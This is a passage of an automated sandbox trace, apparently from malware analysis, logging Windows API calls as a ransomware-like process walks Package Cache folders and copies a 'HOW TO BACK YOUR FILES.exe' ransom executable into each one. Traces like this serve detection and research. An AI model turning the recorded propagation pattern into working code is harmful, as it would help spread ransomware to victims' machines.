dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.458] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.458] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.458] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0090.459] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0090.459] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.459] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.459] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.459] GetLastError () returned 0x0 [0090.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.459] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.460] CloseHandle (hObject=0x120) returned 1 [0090.460] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.460] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.460] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.460] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.460] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0090.460] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0090.460] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.460] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.461] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.461] GetLastError () returned 0x0 [0090.461] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.461] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.461] CloseHandle (hObject=0x120) returned 1 [0090.461] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.461] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c14cd00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c14cd00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.462] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.462] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.462] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0090.462] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0090.462] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.462] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.463] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.463] GetLastError () returned 0x0 [0090.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.463] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.463] CloseHandle (hObject=0x120) returned 1 [0090.463] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.463] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5de59780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5de59780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.463] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.463] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.463] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0090.464] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0090.464] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.464] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.464] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.464] GetLastError () returned 0x0 [0090.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.464] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.465] CloseHandle (hObject=0x120) returned 1 [0090.465] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.465] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.465] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.465] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.465] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0090.465] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0090.465] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.465] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.466] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.466] GetLastError () returned 0x0 [0090.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.466] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.466] CloseHandle (hObject=0x120) returned 1 [0090.466] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.466] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.467] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.467] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.467] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0090.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0090.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.468] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.468] GetLastError () returned 0x0 [0090.468] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.468] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.468] CloseHandle (hObject=0x120) returned 1 [0090.468] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.468] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x5e6ae480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e6ae480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.468] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.468] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.468] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0090.469] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0090.469] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.469] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.469] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.469] GetLastError () returned 0x0 [0090.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.469] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.469] CloseHandle (hObject=0x120) returned 1 [0090.470] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.470] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.470] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.470] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.470] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0090.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages" [0090.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.471] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.471] GetLastError () returned 0x0 [0090.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.471] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.471] CloseHandle (hObject=0x120) returned 1 [0090.471] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.471] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 